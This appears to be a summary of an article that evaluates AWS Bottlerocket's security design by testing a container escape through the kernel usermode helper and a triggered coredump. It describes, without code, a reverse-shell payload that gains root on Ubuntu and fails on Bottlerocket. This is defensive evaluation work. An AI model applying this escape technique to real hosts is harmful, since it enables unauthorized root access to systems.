AWS Bottlerocket is a minimalist operating system designed for secure container hosting. It reduces the attack surface by implementing several security features, such as a read-only root filesystem, a restrictive SELinux policy, and the absence of a command shell or package manager. Instead, updates are managed by The Update Framework (TUF), which ensures atomic and cryptographically signed updates. Administration tasks are handled through purpose-built containers, enhancing overall security by separating management tasks from application workloads. The article tests Bottlerocket's defenses against common container escape techniques, specifically those that exploit the kernel usermode helper through a coredump. In a typical privileged container, an attacker can configure a malicious binary to execute commands on the host when a coredump occurs. The article details how to craft a reverse shell payload, demonstrating the steps required to trigger a coredump and gain root access on a vulnerable Ubuntu installation. When performing the same attack on a Bottlerocket node, the outcome is different. Although the initial setup and triggering of a coredump can still be completed, Bottlerocket's security features prevent the execution of the payload. The waiting reverse shell listener on the attacker's EC2 instance remains silent, demonstrating the effectiveness of Bottlerocket’s security mechanisms against this specific method of exploitation.